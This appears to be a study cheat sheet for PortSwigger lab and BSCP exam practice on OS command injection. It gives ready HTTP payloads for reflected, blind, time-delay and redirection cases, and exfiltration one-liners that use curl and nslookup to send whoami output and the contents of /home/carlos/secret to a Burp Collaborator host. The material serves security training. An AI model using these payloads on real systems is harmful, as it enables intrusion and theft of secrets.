##### OS command injection via stock checker – reflected command output ```http GET /product/stock?productId=1&storeId=1|whoami HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net ``` Context: The `storeId` parameter is concatenated into a shell command (`stockchecker.sh <productId> <storeId>`). By injecting a pipe (`|`) operator, the shell executes `whoami` and returns its output in the HTTP response. Encoding: None Source: [[1. OS command injection, simple case]] --- ##### Blind OS command injection with time delays – blind detection via ping delay ```http POST /feedback HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded email=x||ping+-c+10+127.0.0.1|| ``` Context: Blind OS command injection in the feedback function—output isn't returned, but injecting `ping -c 10` causes a 10-second response delay, confirming execution. Encoding: Spaces encoded as `+` Source: [[2. Blind OS command injection with time delays]] --- ##### Blind OS command injection with output redirection – exfiltrate command output via web-accessible file ```http POST /feedback HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded email=||whoami>/var/www/images/output.txt|| ``` Context: Blind OS command injection in the feedback feature—output isn’t returned directly, but redirecting `whoami` into `/var/www/images/output.txt` writes it to a web-accessible folder. Encoding: None Source: [[3. Blind OS command injection with output redirection]] ---- ##### Blind OS command injection with out-of-band interaction – DNS lookup via Burp Collaborator ```http POST /feedback HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN|| ``` Context: The feedback function executes the injected command asynchronously with no direct output. By issuing an `nslookup` to your Burp Collaborator subdomain, you trigger an out-of-band DNS interaction that confirms code execution. Encoding: None Source: [[4. Blind OS command injection with out-of-band interaction]] --- ##### Blind OS command injection with out-of-band data exfiltration – DNS lookup of `whoami` ```http POST /feedback HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN|| ``` Context: The feedback endpoint executes injected commands asynchronously without returning output. By issuing an `nslookup` to your Burp Collaborator subdomain and wrapping `whoami` in backticks, the OS user is exfiltrated via DNS. Encoding: None Source: [[5. Blind OS command injection with out-of-band data exfiltration]] --- --- ### **OS Command Injection Hint for BSCP:** On the **Submit Feedback** page, the **email field** is a hot candidate — but don't assume DNS callback alone is enough. If you're only seeing your payload work like ``` email=||curl+burp.oastify.com?c=`whoami`|| ``` during the lab, know this: **that’s not enough for the exam**. Instead, **exploit DNS-based exfiltration** to leak actual content: **Use payloads like:** ```bash || nslookup `cat /home/carlos/secret`.burp.oastify.com || ``` Or if that's filtered, try hex obfuscation or base64 wrapping: ```bash || nslookup $(base64 /home/carlos/secret | tr -d '\n').burp.oastify.com || ``` ⚠️ **Why this matters:** The exam will expect **proof of exfiltrating file contents** (e.g., `/home/carlos/secret`) via DNS, **not just a DNS ping**. Your Collaborator log should show subdomains containing the actual secret. 📌 **Pro Tip:** Don’t just stop at the email field. Always test **all user-controllable fields** with OSI payloads — parameters like `subject`, `message`, or even hidden inputs can sometimes be sink points.